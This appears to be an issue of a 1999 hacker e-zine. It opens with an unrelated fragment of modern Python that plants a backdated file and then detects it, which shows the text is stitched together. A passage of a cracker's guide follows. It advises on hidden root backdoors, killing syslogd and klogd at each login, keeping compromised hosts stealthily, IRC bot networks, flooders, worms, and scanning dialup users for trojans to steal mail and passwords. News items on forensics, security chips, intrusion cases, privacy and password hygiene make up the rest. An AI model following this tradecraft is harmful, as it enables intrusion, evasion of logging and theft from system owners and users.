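        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(b"#!/bin/sh\necho hi\n")
    # Stamp a two-year-old mtime/atime onto the planted file; its ctime stays "now".
    old = time.time() - 2 * 365 * 86400
    os.utime(backdated, (old, old))
    return root, clean, backdated


def demo() -> tuple[list[str], str]:
    """Sweep the constructed tree; returns (flagged paths, the backdated path)."""
    root, _clean, backdated = build_demo_tree()
    flagged = [f.path for f in find_backdated_files(root, min_gap_seconds=3600.0)]
    return flagged, backdated


if __name__ == "__main__":
    hits, planted = demo()
    for p in hits:
        print("mtime older than ctime:", p)  # only the planted file is listed
```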
The alternative to all this for lazy people is, to add a
ipfwadm rule that prevents traffic from the outside (-W eth0)
to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn't need tcp port 53 for anything
except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you
detected, lets say if you disable port 110 or 143 on an ISP's
central mail exchange server...
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP,
ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they
open that host to everyone, letting in sniffers, and probably
other people who may damage the host seriously. Make sure to
password protect everything that runs as root. A password
of a minimum length of 8 characters, because you have no way
of detecting a brute force attack. For the C programmers, let
me say, listen(sockfd,1). Maybe 2 connections, but not more.
For comfort, you can add some stuff you want to occur
on each successful backdoor login, like system("w"),
system("killall -9 syslogd klogd"), or whatever. If you want a
front-end backdoor with some integrated functions, try gateway[5].
IV. UTILIZING COMPROMISED SYSTEMS
About your activities:
Do what you desire, but never disregard stealthiness.
If you stop checking log files, processes, or start something
like ping -s 1024 -f cert.org un-stealthed, it is, depending
on the admin, a matter of hours or days until you lose the host.
Most of the time, losing a host means you cannot get access again,
and the admins will examine their system with extreme scrutiny;
if they are too lame, they might contact some external security
experts or even the Computer Emergency Response Team.
Never do serious damage to the system, when you don't have to -
and trust me, you won't. Damaging a system by altering vital system
files, replacing frequently-used programs or even destroying
information is unintelligent, will not do you any good, and will
maybe assist you in getting new enemies.
And it is trivial to mention not to deface web sites...
World domination:
As the number of systems you control increases, you might want
some kind of easy remote control, utilization for attacks,
and detection of detection of your activities. You can install
newnick bots or eggdrop bots with fancy scripts which can be
controlled through IRC to make life easier (make sure to sit and
think before you consider doing anything big with them on IRC!).
You can make your own inter-linked network of root systems,
in which case you need to start programming because no one will
release such a program to the public. :)
You can make little packages with spoofing flooders, smurf
and the like, if you decide to become a packet warrior (then again,
it won't help you accomplish anything but getting irc channels
or shutting down government sites...).
Alternatively, you can use every root you get to scan new netblocks,
and have the information mailed to you or whatever. You can make
an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm
(the last 2 are private), and install them on your roots; make sure
it is well constructed and bug-free...
If you are a creative person, you can make them scan large amounts
of ISP dialup netblocks for back orifice, netbus server, backdoor G,
and what not, and write something that controls their computers
to spread more trojans, send their mail to you, get their
passwords, flood, scan, invade their private lives...
no wait, that's the governments job.
V. YOUR PRESENCE ON THE NET
Smart behavior and senseless behavior:
What you do besides cracking, mostly happens on IRC. IRC
should be seen as a tool for getting in touch with other
skilled persons and exchanging thoughts and information.
To avoid wasting your time, skills, and possibly getting
busted, here are some things which you SERIOUSLY should
not be doing:
1) Warez. Stay away from warez, it is a waste of time.
Warez ruins productive people and makes software expensive.
Besides the moral bullshit, you can always get something
you really need (#1 net game, enterprise application etc.),
and you don't need much, trust me. Almost everything
security / hacking related is free. Joining a warez group
gets you a) a lot of vhosts with lame names b) idiotic
friends c) on the FBI blacklist - nothing besides that.
2) 'IRC War'. Groups like core, chrome, enforce, conflict,
takeover, madcrew, phorce, tnt, etc. etc. who call themselves
'War' groups, are good for nothing. Why would you want to
be a member of a group that attacks other similar groups
and channels - it is comparable to the mafia - almost
as violent, dangerous, except that you don't get rich.
If you think you need 'WarGroup' support for taking a
channel with reasonable security, you are lame or you
can't take a challenge. Think again.
3) Hacking related groups. Inform yourself about what
happened to gH or 'global Hell'. Most of these groups
do the exact opposite of what is advised in this paper.
If you get an offer to join:
l0pht, cDc, MOD, thc, or ADM, take it because you'll
learn a lot, all other groups are not worth your time.
4) IRC operators, BOFH, admin of big systems. Stay away
from them until you are confidently prepared and willing
to fight with them. Blindly attacking them can also be a waste
of time, but it can also become a reasonable challenge.
Keep up to date:
The more you advance in cracking skills, or even might
consider hacking, programming or developing, the web
probably gets the part of the web you use least.
Visit your favorite security related sites frequently,
and make sure to keep up to date about security breaches,
law enforcement, exploits, changes in the methods of
crackers and admins. My bookmarks certainly include
Packetstorm security [6] and GeekGirl [7].
URLS:
[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
-----END PGP SIGNATURE-----
@HWA
05.0 DOD Launches Computer Crime Lab
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by x-empt
The Department of Defense unveiled the newest
high-tech crime laboratory last Friday. Technology
within the lab supposedly has the ability to "trace
hackers across the Internet", break encryption and
rebuild cut up floppy diskettes. The new Defense
Computer Forensics Lab located near Baltimore MD,
(very close to NSA Headquarters) will be staffed by a
team of 80 personnel to help investigate espionage,
murder and other crimes, as well as training other
investigators.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/890127l.htm
Posted at 3:21 p.m. PDT Friday, September 24, 1999
High-tech crime-fight Lab unveiled
BY TED BRIDIS
Associated Press Writer
LINTHICUM, Md. (AP) -- The Defense Department showed off its latest arsenal of
high-tech crime-fighting tools Friday, a $15 million computer lab where it can trace
hackers across the Internet, unscramble hidden files and rebuild smashed floppy disks
that were cut in pieces.
Investigators will use the new Defense Computer Forensics Lab, located in a nondescript
brick building south of Baltimore, to unravel electronic evidence in cases of espionage,
murder and other crimes involving America's military.
Using powerful computers and special software, these 80 digital detectives can trace a
hacker across the Internet to his keyboard, recover files thought to be safely deleted and
quickly search tens of thousands of documents for an important phrase.
Cyberspace is ``a new kind of wild, lawless sort of frontier,'' said Christopher Mellon, a
deputy assistant Defense secretary. ``We have important national interests, and we have
to be able to function.''
Organizers envision sharing equipment and secret techniques they develop to help FBI, state and local authorities prosecute
criminals who use computers, such as drug-dealers who track profits and customers with accounting software.
The FBI even established its own minilab upstairs in the building, though most of its digital forensics work will continue to be
performed in downtown Washington at its headquarters.
``Virtually every white-collar crime case today brings at least one computer, if not a whole network of computers,'' FBI Assistant
Director Donald Kerr said. ``We need people who are well prepared.''
David Ferguson, the lab's director, showed how experts can use these high-tech tools to enhance garbled audio recordings -- even
digitally mute one voice in a conversation to listen to another -- and recover computer files from disks and tapes even if they had
been deleted.
The lab can dissect virtually any type of computer, from handheld devices to Apple computers to those using Windows or even
specialized software. It's developing a way to analyze all machines using a powerful assembly of computers working together,
called a ``Beowulf cluster,'' technology also used by NASA and some Energy Department researchers.
One lab worker, David Lang, demonstrated how investigators can reassemble and read from a computer's floppy disk that a
criminal trying to hide evidence might cut into pieces and crumple.
The procedure, developed a decade ago but still being perfected, takes ``a day if you're lucky, to a month if it's something you
haven't encountered before,'' Lang said. ``It's basically just a jigsaw puzzle to be put back together.''
Ferguson expects to handle about 400 cases each year from all the military branches, mostly crimes where a computer might have
played part in espionage, deaths or sexual assaults. About 10 percent of cases involve tracing hackers snooping through military
computers.
The new program also trains investigators, who will be assigned full time to military posts and bases worldwide. Typical classes are
three weeks of about a dozen students learning about espionage, hackers, networks and special computer hardware.
``What we intend to handle here is the big and large,'' Ferguson said, citing examples where huge amounts of data need to be
analyzed or where a particularly savvy criminal scrambled his digital records and won't give up his password.
Although Ferguson and others declined to discuss specific cases already under way, they described as rare those involving
encrypted files.
The White House agreed last week to allow sale of the most powerful data-scrambling technology with virtually no restrictions,
although military and law enforcement officials have long warned that criminals and terrorists might also use the technology.
Ferguson said he was confident that techniques to break those messages will be adequate once Congress approves a proposal by
the Clinton administration to give the FBI $80 million over four years for the technology.
Defense Department officials also acknowledged that the lab's proximity to the nearby National Security Agency, the government's
premier code-breaking organization, was a primary factor in deciding its location.
@HWA
06.0 IBM to Launch Security Chip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
IBM will unveil today a chip that will include features
such as key encryption and digital signatures. The PC
300PL will be the first IBM computer to include the
security chip. (Hmmm, Not a whole lot of information
here. Can anyone find a link to a data sheet or even
the name of this chip? Will this thing digitally 'sign'
everything? Will the user be able to turn it off?)
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,12997,00.html?cp=reuters
IBM Looks to Lock Down PC Security
Big Blue hopes its security chip will become a standard.
by Reuters
September 27, 1999, 8:23 a.m. PT
IBM plans to launch on Tuesday a security system that
it hopes will set the industry standard for protecting
confidential documents, such as those used in the
growing area of electronic commerce.
Unlike previous security measures that rely on software
"firewalls" that filter out unauthorized users of
information, IBM has developed a security chip
embedded within the computer hardware, which, it
says, adds additional levels of security.
"People from outside [of your organization] can get at
your software," says Anne Gardner, general manager of
desktop systems for IBM. "People from the outside
can't get to your hardware."
The first IBM computer to include the security chip will
be the PC 300PL. The company plans to eventually
include the security features in all of its products.
The chip will come installed in the hardware with no
additional cost to the customer, Gardner says.
The features of the security chip include key
encryption, which encodes text messages, and "digital
signatures," which act as unique "watermarks" that
identify the sender of the document.
Share and Share Alike
"We want this to become an industry standard," IBM's
Gardner says. "We want this on as many desktops as
possible."
Asked if IBM would share the technology with
competing hardware makers, she says, "You may see
something along those lines in the future." She
declines to be more specific.
"It's a good strategy not to try to clutch this technology
and try to make money," says Roger Kay, an analyst
at International Data Corporation. "It's a good strategy
to give it away and try to get as many people to go for
it as possible. IBM doesn't want this to be proprietary.
They want it to be ubiquitous."
Kay calls the development "a good first step" toward
making people more comfortable doing business over
the Internet.
"Over the next two years you're going to see an
increased focus on security as more people do
business over the Web," says Joseph Ferlazzo, vice
president of syndicated services for Technology
Business Research.
"It's essential to have a verifiable digital signature that
will allow companies to engage in business
transactions," he adds. "What IBM is trying to do is
make this an essential part of computer configurations
going forward so that the capability will already be
inside the computer."
@HWA
07.0 Law Firm Sued Over Possible Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
Moore Publishing of Pennsylvania is seeking more than
$800,000 in damages from the Washington based legal
firm of Steptoe & Johnson. The suit alleges that an
employee of Steptoe & Johnson attempted to break in
to the computer systems of Moore Publishing. Steptoe
has vehemently denied the charges but Moore claims
that they have logs that will prove their case.
Washington Post
http://search.washingtonpost.com/wp-srv/WPlate/1999-09/20/018l-092099-idx.html
Monday Morning
Monday, September 20, 1999; Page F03
DID YOU HEAR? . . .
"It was probably the biggest disappointment I had in years of economic
development [work] because it seemed so winnable."
-- Richard Monteilh, former D.C. economic development official, on losing
MCI WorldCom Inc. operations to Loudoun County.
Tracking a Hacking
Plenty of lawyers have been called hacks, but lawyers at Steptoe & Johnson
are among the first to be called hackers.
Seeking more than $800,000 in damages, Moore Publishing of Pennsylvania
sued the blue-chip Washington firm for allegedly trying to sneak into one of
the company's Internet domains. The lawsuit, filed last week, alleges that
someone at Steptoe -- they're not sure who -- tried to hack into the site eight
times in August.
"The attempt did not display the mark of genius," said Rodney Sweetland, the
Arlington solo practitioner suing on Moore's behalf. "Whoever did this knew
something about hacking, but not enough to cover their tracks."
Steptoe officials say the suit is completely baseless and that they'll fight it
vigorously. The firm has already rebuffed an overture to settle the matter out
of court.
Sweetland claims that computer logs will prove his case, but he offered only
a sketchy explanation of Steptoe's possible motives. Moore's primary
business is digging up electronic data for companies conducting asset
searches, but it has a sideline as a cyber-squatter. It has purchased the rights
to the Internet domain names of a handful of law firms, apparently hoping to
resell those rights at a later date. Among the names it owns:
Steptoejohnson.com.
Still, it's unclear why any Steptoe employee would care. The firm already
has a Web site at steptoe.com.
-- David Segal
@HWA
08.0 Danish Man Sentenced for Intrusion Attempt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by root
A man, whose name has not been released, has
received a two year suspended sentence for attempting
to break into the personal computer of the head of the
Copenhagen police's special computer crime unit. The
illegal activities took place in January of this year. The
judge in the case did not follow the prosecution's
suggestions to confiscate the accused computer
equipment.
Phoz.dk
http://www.phoz.dk/news/en/bo_trial.html
HNN Archive for January 25, 1999
http://www.hackernews.com/arch.html?012599
Phoz.dk - news
20-year old hacked police officers computer
This is the newest article, covering the actual sentence
"It may sound silly but I did it to help other people".
With a low voice, clearly nervous a 20-year old man explained Wednesday
in Copenhagen Courtroom, how he in January 1999 hacked two different
private computers. He did this using a tool that via the Internet searches
for machines infected with a certain trojan.
The attacker was earlier victim of the same tool so it came naturally to warn others against it.
"I now realise that this is illegal. I wasn't certain back then", said the young hacker
who didn't destroy anything during his hacking attempts.
He got a suspended sentence with no limitations and a trial time for two years.
The judge didn't follow the prosecutor's suggestions that the hacker's
computer equipment should be confiscated by the police.
"You have probably got enough warnings," judge Henrik Bitsch said.
The 20-year old hacker was uncovered when he tried hacking a computer
based in the home of a police officer. An anti-virus tool identified
the intruder and led the police to his house.
...
Danish Hacker Picks Wrong Victim
The first article, don't remember who the author was.
COPENHAGEN, Denmark (Jan. 22, 1999) - A 19-year-old Danish student
picked the wrong victim when he hacked his way into a home computer.
He was arrested Thursday by the machine's owner - the head
of the Copenhagen police's special computer crime unit.
Detective Arne Gammelgaard had installed an anti-virus program in his computer at home.
On Sunday, it warned him about an intruder and enabled him to gather information about
the visitor. Gammelgaard investigated and an Internet provider helped track the hacker.
The student, whose name was not released, confessed to hacking
and said he randomly picked the cyber-cop.
The hacker was released after he was charged with ``unauthorized access to another
person's documents or programs.'' The maximum penalty is six months' imprisonment.
@HWA
09.0 DOE to Spend $80mil on Info Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Sarge
The Department of Energy will spend $80 million over
the next two years to create a security net for its
systems. A four point plan covering policy, personnel,
operational and technical requirements has been
approved by DOE senior management. This new plan
comes soon after the Los Alamos espionage scandal.
($80 million? Damn thats a lot of dough.)
Government Computer News
http://www.gcn.com/vol18_no32/news/700-1.html
September 27, 1999
DOE sets security course
Department will allot $80 million to bolstering data controls
By Frank Tiboni
GCN Staff
The Energy Department will spend $80 million over the next two years to create a
security net for its systems, chief information officer John Gilligan said of the
cybersecurity plan he will roll out departmentwide next month.
The four-point plan calls for sweeping changes in how the department protects its data
resources, Gilligan said. He said the plan's four areas address policy, personnel,
operational and technical requirements. He submitted the plan to Energy senior
management late last month and got the green light to begin work immediately.
To make sure that new security initiatives take hold beyond department headquarters, Gilligan has asked field
sites to designate CIOs or equivalent officials as lead security officers.
The obvious first step is awareness, Gilligan said, so a major component of the plan is training and education.
The department will begin a two-year, $2 million multimedia program right away, he said.
Secretary Bill Richardson initiated several security reforms in the wake of the Los Alamos espionage scandal,
including giving computer security oversight to Gilligan [GCN, May 24, Page 1].
A central component of Richardson's reform package directs Gilligan to improve the security of information that
is stored, processed or transmitted by Energy systems.
The reforms also realigned the CIO's office under the new Office of Security and Emergency Operations, which is
headed by former Air Force Gen. Eugene E. Habiger [GCN, June 28, Page 1].
The 47-page systems security plan, which Gilligan's staff had been working on since mid-May with help from
Booz, Allen & Hamilton Inc. of McLean, Va., Electronic Data Systems Corp. and Mitre Corp. of Bedford,
Mass., details ongoing and planned activities. Gilligan said the department will use it as a cybersecurity road
map for the next five years.
"It's a sound plan that's comprehensive, addresses needs and is doable," he said. "It will clearly allow us to
achieve a significant improvement in computer security in the next two years."
Gilligan said he will coordinate the execution of the plan through the department's Field Management Council.
During Phase 1, which takes place from October through December, more than 1,000 systems administrators
and managers at the department's national laboratories will undergo training in network security, system-specific
configuration planning, Web server security, mail server security and cybersecurity policies for managers.
Following up on that initial training, Energy will broaden its program to ensure that appropriate training is given to
all DOE personnel and contractors within the next two years. The training will cover the security requirements for
all systems, those that handle classified information as well as those that handle unclassified data.
Gilligan said another effort will be to improve security operations in the department. Energy will spend $45 million
of the $80 million it is setting aside for systems security through fiscal 2001 on bolstering program management,
monitoring ability and protection know-how.
As part of this effort, Energy will expand the staff of its Computer Incident Advisory Capability at the Lawrence
Livermore National Laboratory in Livermore, Calif., from seven to 25 people over the next year.
"CIAC will be Energy's first line of defense. It will spearhead intrusion assessment, warning and response, and
the day-to-day monitoring of department systems and networks," Gilligan said.
@HWA
10.0 The Army Wants to Eliminate Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Sarge
The US Army wants to reduce or eliminate password use
by using biometric alternatives for access to computer
and weapons systems. The Army wants unique
identifiers that cannot be stolen or forgotten and is
looking to biometrics as the answer. The Army is
currently conducting a study that will consider the legal
and sociological implications as well as logistical issues
surrounding large-scale biometric recognition.
Government Computer News
http://www.gcn.com/vol18_no32/news/702-1.html
September 27, 1999
The service wants to eliminate passwords for verifying users
By Patricia Daukantas
GCN Staff
The Army will investigate biometric recognition devices as a way to reduce or eliminate password use for
accessing computer and weapons systems.
"Commercial biometrics can be leveraged for military systems," said Phillip Loranger, a division chief at the Army
Information System Security Office in the Directorate of Information Systems for Command, Control,
Communications and Computers.
The Army wants soldiers to have unique identifiers that cannot be stolen or forgotten. "We need to dump the way
we do passwords," Loranger said this month at a meeting of the Biometric Consortium in Arlington, Va.
The service approved the study early this month and is kicking it off with fiscal 1999 year-end funds. Loranger
declined to put a price on the effort, which he will lead. He said the study, slated for completion by spring, will
consider the legal and sociological implications and the feasibility of large-scale biometric recognition for Army
systems.
Iris recognition, in which an imaging system scans the pattern of an eye's iris, will be the first technology
studied. It has an edge over fingerprint and voice recognition, Loranger said, because it works even when
someone is wearing protective headgear.
"Voice doesn't work through a gas mask," Loranger said. "Fingerprints can't be taken through rubber gloves." He
said recent innovations allow iris recognition through plastic face shields and eyeglasses.
The system uses a small imaging device, not unlike a digital camera, that plugs into a PC and compares a
user's iris image against stored patterns of known users.
The study will also examine fingerprint and voice recognition. Loranger said the Army already collects soldiers'
fingerprints. The recognition tools for desktop PCs cost $100 to $2,000, he said, and can be built into keyboards,
mice and notebook computers.
Voice recognition systems can work either at desktop systems or over dial-up lines, requiring only a
microphone and a sound card.
The study will examine setting up an Army or Defense Department center for biometric technology. "You couldn't
find a better test bed anywhere than the Army," Loranger said, because its computers run at least 17 operating
systems, including legacy OSes.
Too hard
He acknowledged that some systems still will require passwords, at least with today's technology. But asking
soldiers to remember multiple eight-digit, randomly generated pass codes is "hard security," Loranger said. "The
easier you make reliable security, the better that security will be."
He said he is more interested in integrating off-the-shelf technology into military systems than in conducting an
extensive development effort from scratch.
Loranger said he envisions a time when biometric recognition will even be integrated into the handgrips of guns to
prevent unauthorized use. "All it takes is time and money," he said.
@HWA
11.0 MediaPlayer and RealPlayer send GUID's to internet sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
http://www.seattleweekly.com/features/9914/tech-fefer.shtml
Media Player and privacy
BY MARK D. FEFER
ONE PLACE WHERE RealNetworks and Microsoft are unlikely to compete is on the issue of privacy.
There has been a flurry of controversy lately over uniquely identifying numbers embedded in Intel's new
Pentium III chip and Microsoft's Windows 98 operating system. To quell the outrage, Intel has
introduced software that will allow computer users to hide the chip's unique serial number, so that it
can't be used to track users' Web behavior. And Microsoft has pledged that it will no longer collect a number known as the
Globally Unique Identifier, or GUID, when registering Windows 98 users.
All the while, however, people who use streaming media have already been tagged with such a unique, identifying number.
Seattle Weekly has learned that both the RealNetworks' RealPlayer and the Windows Media Player carry GUIDs, and those
numbers are transmitted to any site where you access a streaming file. This opens up at least the possibility of a database in
which all your streaming media use can be recorded (though there is no indication that such a database exists).
Gary Schare, Microsoft's lead product manager for Windows Media Technologies, confirms that each Media Player carries a
GUID. But he says the company keeps no database with those numbers and does not track individual Media Player usage.
RealNetworks officials did not respond to numerous requests from Seattle Weekly to discuss the subject of GUIDs. But
executives in the business of tracking Web usage say that the RealPlayer, too, carries an identifying code. And RealNetworks,
unlike Microsoft, requires you to submit your name and e-mail address before allowing you to download the player.
Every time you click onto a Web page, a variety of information about you is automatically recorded in the site's "log
files"--information such as what kind of browser you use, what page you were last visiting, how long you stayed at the site, etc. If
you use a media player at the site, your media-streaming activities are also recorded, along with your player's ID number.
Bill Piwonka, a product manager at Portland-based WebTrends, which makes the leading software program for sorting and
analyzing log files, says that although media player GUIDs appear in the files, WebTrends does not actually compile those ID
numbers or present them in its reports. "WebTrends doesn't do anything with the number," he says. "We're not really sure what
it's there for or how it's used."
On the other hand, Piwonka notes, "There's no way for us to know if Microsoft or Real have put something in there that helps
them track." Computer programmer Richard M. Smith, the head of Phar Lap Software, who first drew attention to the Windows
98 GUID last month, says the only way to find out would be to "put a 'packet sniffer' on, and see what's going down the wire"
when you call up a media stream.
But Gary Schare of Microsoft insists that "the only place [the GUID] appears is in the log files. We don't ever pass that
information around, or back to Microsoft in any way." Schare says the only contact between the player and Microsoft is through
"our upgrade mechanism," whereby a player will "ping" the Microsoft server, and you'll be automatically "reminded" to upgrade if
you don't have the current Player version. But even that mechanism, while in place, has not been activated, Schare says.
So why is the GUID even there? At press time, Schare said he did not know the technical justification. "I know there's a good
reason. We don't just stick stuff like that in randomly."
Jason Catlett, who runs the privacy watchdog Junkbusters, speculates that the GUID could be useful for apprehending copyright
violators. Just as the Windows 98 GUID is imprinted in documents created with Microsoft Office, the GUID from your player
could be imprinted into the media file, Catlett speculates, and that could help track down the source of any unauthorized
copying.
But Schare contends that streaming files are untouched. "It's read only. There's no tracking in a piece of content as to who's
played this. That doesn't occur."
@HWA
12.0 GTE accidentally sends unlisted numbers to telemarketers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
California's second-largest telephone company included about 50,000 unlisted numbers and addresses in
the lists that they routinely sell to telemarketers, AP reported. (1998/4/17)
@HWA
13.0 ``Relationship Marketing?'' We have to talk...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
Susan Fournier, author of Preventing the Premature Death of Relationship Marketing has found that
``consumers are growing irritated and overwhelmed by the personal information being gathered about
them in the name of direct marketing. One woman recently canceled her supermarket loyalty card after
she received a personalized letter reminding her that it was time she bought more tampons.''
-- The Economist (1998/3/14, p. 68)
@HWA
14.0 News and views from SLa5H
~~~~~~~~~~~~~~~~~~~~~~~~~
* N E W S B Y S L a 5 H *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If you would like to contribute something, contact me (smuddo@yahoo.com) or Cruciphux at cruciphux@dok.org. Also check out my site at:
http://members.xoom.com/_XOOM/dao32/
Content
~~~~~~~
1.HOT NEWS
- Hacker Pleads Guilty To Grade-Fixing
- Are Eastern Europe's Banks Being Cracked?
- Implementing Security Measures
- Activists Pull Stunt To Show Crypto Holes
- U.S., Network Solutions Reach Agreement
- CMGI to acquire free ISP 1stUp
- Microsoft - ActiveX Holes
- Privacy Groups Wary Of Encryption Reforms
- Wild Wild Web
- Desperate countdown to ready Cold War remnants for Y2K
- Computer wizards crack code in worldwide challenge
- U.S. finds malicious code changes in Y2K "fixes"
- financial firms create Net crime watch
- SEC investigates NetRoadshow security breach
- Court to revisit encryption ruling
- Microsoft Patches IE Security.....Again
- Justice Dept. Funds Antihacking Campaign
- Quantum confidential
- Online Credit Card Security Fears Waning, But Still a Factor
- India: Code-Smuggling? Absurd
2.SPECIAL
- Hacking in 1999 | Current state of hacking
3.VULNERABILITIES
- Linux Kernel 2.2.x ISN Vulnerability
4.READING MATERIAL
- Mastering Network Security
- Cisco IOS Network Security
- Cryptography and Network Security : Principles and Practice
- Internet Security : Professional Reference
1. H O T N E W S
~~~~~~~~~~~~~~
Hacker Pleads Guilty To Grade-Fixing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An 18-year-old computer hacker who boosted grades for fellow high school students in exchange for money has pleaded guilty to one count of felony computer trespass.
Sentencing for Adam R. Jerome was scheduled for Oct. 7 in Clark County Superior Court. Jerome's accomplice in the crime, Phillip J. Latimer, also 18, pleaded guilty Friday to a lesser charge of misdemeanor computer trespass.
"Mr. Latimer was essentially the marketing person for Mr. Jerome's services," deputy prosecutor Beau Harlan told Judge Barbara Johnson.
Latimer collected between $2 and $80 from 22 Evergreen High School students, most of them seniors, who wanted their transcripts altered. He was handed a 30-day sentence -- two days in Clark County Jail and 28 days on work crew -- and will be on probation for one year.
Harlan said he'll recommend a 90-day sentence for Jerome, who was on juvenile probation for burglary when he hacked into the school district's computer system. Jerome altered 31 transcripts in all, Harlan said.
Word of the grade-boosting surfaced in April. Jerome and Latimer were charged in June.
School officials estimate it will cost more than $15,000 to upgrade the security on the computer system, Harlan said. Latimer and Jerome will be ordered to pay restitution. Jerome's lawyer, Jon McMullen, said his client had no idea hacking into the school's computer system was a felony.
"He knew what he was doing was wrong, but it's a question of how wrong," McMullen said. "He thought he might be expelled, but not labeled a felon for the rest of his life."
Latimer, who has no prior criminal record, said the hacking started as a prank. "To this day I can't really say why I did it," Latimer said. "I just honestly know it was a mistake." Prosecutors decided not to charge the students who paid to have their grades changed. They were suspended from school for 10 days.
Are Eastern Europe's Banks Being Cracked?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A few weeks ago, marketing companies in the Czech Republic received an anonymous e-mail from a self-proclaimed computer security expert. The e-mail's author boasted of having just penetrated the system of the largest bank in the country.
The network cracker was offering to sell to the marketing firms information about Ceska Sporitelna's 2.5 million customers including where they worked, how much they made and their account numbers. As Czech reporters struggled to unravel the case, they were hindered by contradictory revelations from the police department and the bank. Early reports, attributed to an unnamed police source, carried full details of the alleged hack, saying that the bank's systems had indeed been penetrated, and that detectives had verified the authenticity of the data.
But by the middle of last week, the police department was no longer answering questions, saying an information embargo had gone into effect on Sept. 15. The day before, the bank's general director had issued a statement saying that the hacks had never happened, and were merely an effort to discredit the state-run bank, which is gearing up for privatization. Then the bank, too, stopped commenting.
The International Chamber of Commerce, a body of companies and trade associations from 130 countries, says its anxiety about such cases is growing. As financial institutions around the world continue to bring services online, security measures become more imperative and more vulnerable than ever. According to Blue Sky Research in Paris, European Internet sites in particular are growing by large percentages. Blue Sky reported in July that the number of banking sites in Europe had grown from 863 in November 1998 to 1,845 by the following summer.
Pottengal Mukundan, the director of the ICC's Commercial Crime Services division, says the biggest complication is that banks don't want the world to know when a breach has occurred. "For the last couple of years we have been looking at this problem," Mukundan says. "We can't speak of examples, because this is a sensitive subject. Banks in particular don't wish these cases to be made public."
In response, Mukundan says the ICC is readying a special unit to tackle cybercrime. The unit will make its public debut in London at the end of the year, at the Alliance Against Cybercrime conference. The new department, he says, will allow companies to keep their worries private. The unit hopes to solve cybercrimes without exposing banks to dangerous publicity.
"Basically, we act as a club for our members so they can talk to us in confidence," Mukundan says. "Normally, in matters such as fraud, banks and insurance companies are very hesitant to talk to other banks. The idea in forming the [cybercrime] bureau is that they will feel a little more secure in telling us what their experiences are. We will then hold on to the information and pass it on to other [companies] without revealing the source." A similar approach, he adds, has worked in other industries like international shipping.
The ICC's closed-door plan holds particular appeal for banks in Eastern Europe and developing nations, according to Evan Neufeld, VP of international research at Forrester Research (FORR) in London. Competition, market regulation and law-enforcement agencies prevent banks in the U.S., Western Europe and developed Asia from hiding security breaches.
Implementing Security Measures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
So far we have talked about your risks, known exploits and bugs, and your policies or lack of them, but now we start to get into the meat of Internet and network security. It is now time to start implementing security measures on your system.
We are going to start with passwords. We begin here because (a) It is a pet peeve of mine that system and network passwords are so often badly managed, (b) This is the first and most important link in your security chain, and (c) it is a very easy place to start.
I have gone over this part of basic password policy before, but it is so basic and so important that I feel it is worth repeating. Make your passwords secure by following certain rules. Here are some do's and don'ts.
Don't use the following for passwords:
- Your first name
- Your last name
- Your login name
- Your pet's name
- Any name at all
- SS number
- House number
- Telephone number
- Your bank PIN
- Any password shorter than six characters
Do use:
- Passwords of six characters or more
- A combination of letters and numbers
- A combination of letters, numbers, and special characters
What makes a password secure is the amount of complexity you put into creating it. This complexity is not just to prevent someone from guessing the password, but also to thwart crackers who use special cracking software. Password cracking programs work by comparing the passwords against a dictionary of words. This means that any word at all can easily be discovered: any word that can be found in a dictionary, no matter how obscure it may seem, can easily be revealed. Most password cracking programs, after using the dictionary approach, will then start using combinations of letters. A password that has what seems like a random sequence of pure letters is also easily cracked; I was able to crack the password "kgjhuy" in under two minutes. The next attack a password cracking program will use is a combination of letters and numbers. I was able to crack the password "jim1952" in under 10 minutes. Similarly, the password "j1i9m52" took a couple of hours to crack. The password "jim&1*9!52#" has not been cracked yet after more than 12 hours. So the most secure password is one that is more than six characters long and is a combination of letters, numbers, and special characters intermixed within the password.
